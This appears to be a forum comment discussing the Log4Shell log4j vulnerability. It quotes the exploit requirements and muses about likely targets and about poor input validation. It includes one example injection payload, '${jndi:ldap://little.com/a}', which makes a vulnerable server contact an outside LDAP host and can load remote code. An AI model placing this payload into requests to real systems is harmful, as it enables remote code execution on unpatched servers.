There was a nice article about this on ars technica (and about a million other places on twitter and google news). If you need more detailed instructions how to, see also lunasec:
Exploit Requirements
A server with a vulnerable log4j version (listed above),
an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
and a log statement that logs out the string from that request.
Point 2 is important and suggestive of more immediate concern needed for here this address, or a more attractive subject is prob. https://www.wolframcloud.com/. (Though I don't think wolfram is attracting too much negative attention relative to google or twitter.).
What's amazing if you look at pics of the "Analysis" is that it appears many of the "successful" (ugh) calls are going through fields that should have some sort of validation... Nobody's name is actually "${jndi:ldap://little.com/a}".
The real sad part is that while crooks get famous and anonymous at once, knowledgeable experts get only viewers numbered in the hundreds? See also: Tanja Lange: Intro to Cryptography. Free course from TUE, best in world class, and only ~200 views? Another example of biasing issues with online media. Added value, some will find Tanja funnier than SNL:
"...But don't say attack. Call it analysis instead."
LOL!